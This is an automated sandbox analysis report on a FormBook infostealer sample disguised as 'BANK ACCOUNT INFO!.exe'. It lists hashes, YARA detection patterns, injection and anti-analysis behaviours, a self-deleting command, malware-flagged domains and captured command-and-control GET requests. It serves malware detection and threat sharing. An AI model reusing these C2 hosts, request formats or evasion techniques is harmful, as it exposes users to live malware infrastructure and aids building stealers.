Play interactive tour

Edit tour

Analysis Report BANK ACCOUNT INFO!.exe

Overview

General Information

Sample Name:	BANK ACCOUNT INFO!.exe
Analysis ID:	321134
MD5:	0bd3e9073a968fd6c10c3b163302c2c9
SHA1:	f0b948a18e960b1e5141471fe6e1cb4e85a2867d
SHA256:	dde122ac5a5a8eb786e335b3278dc5aae9cd3635c889fc4eb641a7a69123954d
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

BANK ACCOUNT INFO!.exe (PID: 5264 cmdline: 'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe' MD5: 0BD3E9073A968FD6C10C3B163302C2C9)

BANK ACCOUNT INFO!.exe (PID: 1708 cmdline: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe MD5: 0BD3E9073A968FD6C10C3B163302C2C9)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wscript.exe (PID: 5884 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 3216 cmdline: /c del 'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x67788:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x679f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x93fa8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x94212:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x73515:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x9fd35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x73001:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x9f821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x73617:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9fe37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7378f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9ffaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6840a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x94c2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x7227c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ea9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x69103:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x95923:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x79387:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa5ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x7a38a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x762a9:$sqlite3step: 68 34 1C 7B E1 0x763bc:$sqlite3step: 68 34 1C 7B E1 0xa2ac9:$sqlite3step: 68 34 1C 7B E1 0xa2bdc:$sqlite3step: 68 34 1C 7B E1 0x762d8:$sqlite3text: 68 38 2A 90 C5 0x763fd:$sqlite3text: 68 38 2A 90 C5 0xa2af8:$sqlite3text: 68 38 2A 90 C5 0xa2c1d:$sqlite3text: 68 38 2A 90 C5 0x762eb:$sqlite3blob: 68 53 D8 7F 8C 0x76413:$sqlite3blob: 68 53 D8 7F 8C 0xa2b0b:$sqlite3blob: 68 53 D8 7F 8C 0xa2c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.213965097.00000000028B1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: BANK ACCOUNT INFO!.exe PID: 5264	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.meatslasvegas.com/sbmh/	Avira URL Cloud: Label: malware
Source: http://www.meatslasvegas.com/sbmh/www.salon-massage-linit.com	Avira URL Cloud: Label: malware
Source: http://www.meatslasvegas.com	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: BANK ACCOUNT INFO!.exe	Virustotal: Detection: 21%			Perma Link
Source: BANK ACCOUNT INFO!.exe	ReversingLabs: Detection: 10%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: BANK ACCOUNT INFO!.exe

Joe Sandbox ML: detected

Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: global traffic	HTTP traffic detected: GET /sbmh/?FPWlMXx=PcjUtjh0MRWP8BRvWG8NuUt69AEkHHHW5P4XnB/f7cjpZcBvzWU1+UolGZvfCul1Hwqj&AlO=O2JtmTIX2 HTTP/1.1Host: www.ablehead.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2 HTTP/1.1Host: www.katrinarask.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sbmh/?FPWlMXx=+2tIfJwwghXNm+fysv8+EMC6xMyDXIpTEsDIQwPK5FpH6PGBMSGX6HHqgPLM/DeZI3NR&AlO=O2JtmTIX2 HTTP/1.1Host: www.wellnysdirect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.49.23.141 198.49.23.141

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic	HTTP traffic detected: GET /sbmh/?FPWlMXx=PcjUtjh0MRWP8BRvWG8NuUt69AEkHHHW5P4XnB/f7cjpZcBvzWU1+UolGZvfCul1Hwqj&AlO=O2JtmTIX2 HTTP/1.1Host: www.ablehead.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2 HTTP/1.1Host: www.katrinarask.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sbmh/?FPWlMXx=+2tIfJwwghXNm+fysv8+EMC6xMyDXIpTEsDIQwPK5FpH6PGBMSGX6HHqgPLM/DeZI3NR&AlO=O2JtmTIX2 HTTP/1.1Host: www.wellnysdirect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.friendlyksa.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 11:02:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 62 6d 68 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sbmh/ was not found on this server.</p></body></html>

Source: explorer.exe, 00000002.00000003.295037272.000000000F541000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.229795137.0000000008907000.00000004.00000001.sdmp	String found in binary or memory: http://crl.m
Source: explorer.exe, 00000002.00000000.229795137.0000000008907000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.213965097.00000000028B1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.ablehead.net
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.ablehead.net/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.ablehead.net/sbmh/www.katrinarask.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.ablehead.netReferer:
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.downrangedynamics.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.downrangedynamics.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.downrangedynamics.com/sbmh/www.meatslasvegas.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.downrangedynamics.comReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.elegancerealestategroup.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.elegancerealestategroup.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.elegancerealestategroup.com/sbmh/www.hoy.viajes
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.elegancerealestategroup.comReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.endlessgirls.online
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.endlessgirls.online/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.endlessgirls.online/sbmh/www.makgxoimisitzer.info
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.endlessgirls.onlineReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.exposingsecrets.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.exposingsecrets.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.exposingsecrets.com/sbmh/www.parking500.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.exposingsecrets.comReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.faculdadegraca.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.faculdadegraca.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.faculdadegraca.com/sbmh/www.magentos6.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.faculdadegraca.comReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.firedoom.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.firedoom.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.firedoom.com/sbmh/www.endlessgirls.online
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.firedoom.comReferer:
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
